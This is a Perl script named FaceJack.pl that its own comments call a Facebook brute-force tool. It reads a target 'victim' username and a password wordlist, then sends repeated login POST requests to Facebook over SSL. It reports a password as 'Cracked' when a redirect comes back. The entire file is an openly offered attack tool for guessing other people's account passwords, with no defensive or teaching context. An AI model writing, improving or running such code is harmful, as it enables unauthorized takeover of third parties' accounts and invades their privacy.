FaceJack.pl

1. #!/usr/bin/perl
2. #Facebook Brute-Force script by Exploit
3. #After a certain amount of tries you might recieve "You are trying to often, Please try again later"!
4. use strict;
5. use Net::SSLeay::Handle;
6.  
7. if(!defined($ARGV[0] && $ARGV[1])) {
8.  
9. system('clear');
10. print "======================================================\n";
11. print "# USAGE: perl FaceJack.pl victim passwords.txt       #\n";
12. print "======================================================\n";
13.  
14. exit; }
15.  
16. my $user = $ARGV[0];
17. my $passlist = $ARGV[1];
18.  
19. open (LIST, $passlist) || die "\nCannnot find wordlist $passlist \n";
20.  
21. print "\n \n";
22. print "#######################################################\n";
23. print "#                     --- Exploit ---                 #\n";
24. print "####################################################### \n";
25. print "# USAGE: perl FaceJack.pl victim passwords.txt        #\n";
26. print "#######################################################\n";
27. while (my $password = <LIST>) {
28. chomp ($password);
29. $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
30.  
31. my $a = "POST /login.php HTTP/1.1";
32. my $b = "Host: www.facebook.com";
33. my $c = "Connection: close";
34. my $e = "Cache-Control: max-age=0";
35. my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
36. my $g = "Origin: https://www.facebook.com";
37. my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
38. my $i = "Content-Type: application/x-www-form-urlencoded";
39. my $j = "Accept-Encoding: gzip,deflate,sdch";
40. my $k = "Accept-Language: en-US,en;q=0.8";
41. my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
42.  
43. my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
44. my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
45. my $cl = length($post);
46. my $d = "Content-Length: $cl";
47.  
48.  
49. my ($host, $port) = ("www.facebook.com", 443);
50.  
51. tie(*SSL, "Net::SSLeay::Handle", $host, $port);
52.  
53.  
54. print SSL "$a\n";
55. print SSL "$b\n";
56. print SSL "$c\n";
57. print SSL "$d\n";
58. print SSL "$e\n";
59. print SSL "$f\n";
60. print SSL "$g\n";
61. print SSL "$h\n";
62. print SSL "$i\n";
63. print SSL "$j\n";
64. print SSL "$k\n";
65. print SSL "$l\n";
66. print SSL "$cookie\n\n";
67.  
68. print SSL "$post\n";
69.  
70. my $success;
71. while(my $result = <SSL>){
72. if($result =~ /Location(.*?)/){
73. $success = $1;
74. }
75. }
76. if (!defined $success)
77. {
78. print "$password -> Cracking \n";
79. close SSL;
80. }
81. else
82. {
83. print "\x1b[32mCracked  => $password <=\n";
84. close SSL;
85. exit;
86. }
87. }